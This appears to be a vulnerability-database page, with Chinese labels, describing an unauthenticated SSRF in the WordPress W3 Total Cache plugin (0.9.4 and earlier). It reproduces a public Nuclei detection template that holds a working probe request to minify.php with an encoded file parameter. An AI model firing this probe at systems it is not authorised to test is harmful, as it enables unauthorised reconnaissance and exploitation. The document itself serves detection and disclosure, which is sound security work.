w3c-total-cache-ssrf: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)

日期: 2025-08-01 | 影响软件: Wordpress W3C Total Cache | POC: 已公开

漏洞描述

The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.

PoC代码[已公开]

id: w3c-total-cache-ssrf

info:
  name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
  author: random_robbie
  severity: medium
  description: |
    The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
  reference:
    - https://wpvulndb.com/vulnerabilities/8644
    - https://klikki.fi/adv/w3_total_cache.html
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,cache,ssrf,wp,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'

    matchers:
      - type: word
        part: body
        words:
          - "NessusFileIncludeTest"
# digest: 490a00463044022053a6573eb35f9f7511f7d368f1b7a08ccaea8ea366abf11bea7dd89810aa6ac302207012ce3d63958f0ac32abda4ebe8f8dff897d791b2b26305fe109c64dbf99936:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐